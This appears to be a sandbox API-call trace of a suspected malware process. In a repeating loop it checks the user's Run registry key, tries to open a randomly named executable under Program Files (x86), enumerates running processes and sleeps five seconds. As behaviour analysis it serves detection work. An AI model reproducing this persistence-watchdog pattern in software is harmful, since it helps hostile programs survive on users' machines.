0x0 [0296.280] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0296.280] NtClose (Handle=0x338) returned 0x0 [0296.280] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0296.280] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0296.281] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de7a0) returned 1 [0296.281] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0296.281] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0296.281] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de3a0) returned 1 [0296.281] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0296.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0296.283] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0296.283] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0296.284] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0296.388] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0296.389] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0296.391] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0296.391] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0296.391] NtClose (Handle=0x338) returned 0x0 [0296.391] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0296.391] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0296.391] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5deaa0) returned 1 [0296.392] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0296.392] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0296.392] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de1a0) returned 1 [0296.392] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0296.392] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0296.395] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0296.395] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0296.395] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0296.501] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0296.502] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0296.503] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0296.504] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0296.504] NtClose (Handle=0x338) returned 0x0 [0296.504] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0296.504] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0296.505] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de120) returned 1 [0296.505] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0296.505] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0296.505] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5deaa0) returned 1 [0296.505] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0296.505] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0296.507] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0296.507] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0296.508] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0296.606] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0296.606] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0296.608] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0296.609] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0296.609] NtClose (Handle=0x338) returned 0x0 [0296.609] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0296.609] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0296.609] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de120) returned 1 [0296.609] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0296.609] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0296.610] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ddda0) returned 1 [0296.610] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0296.610] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0296.612] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0296.612] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0296.612] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0296.712] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0296.712] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0296.714] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0296.714] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0296.714] NtClose (Handle=0x338) returned 0x0 [0296.714] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0296.714] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0296.714] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de3a0) returned 1 [0296.714] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0296.714] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0296.715] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de120) returned 1 [0296.715] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0296.715] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0296.718] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0296.718] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0296.718] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0296.837] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0296.837] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0296.839] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0296.840] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0296.840] NtClose (Handle=0x338) returned 0x0 [0296.840] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0296.840] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0296.840] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ddda0) returned 1 [0296.840] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0296.840] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0296.840] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ddda0) returned 1 [0296.840] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0296.840] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0296.842] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0296.842] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0296.843] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0296.939] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0296.940] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0296.942] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0296.942] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0296.943] NtClose (Handle=0x338) returned 0x0 [0296.943] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0296.943] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0296.943] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5dde20) returned 1 [0296.943] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0296.943] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0296.943] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5dec20) returned 1 [0296.943] 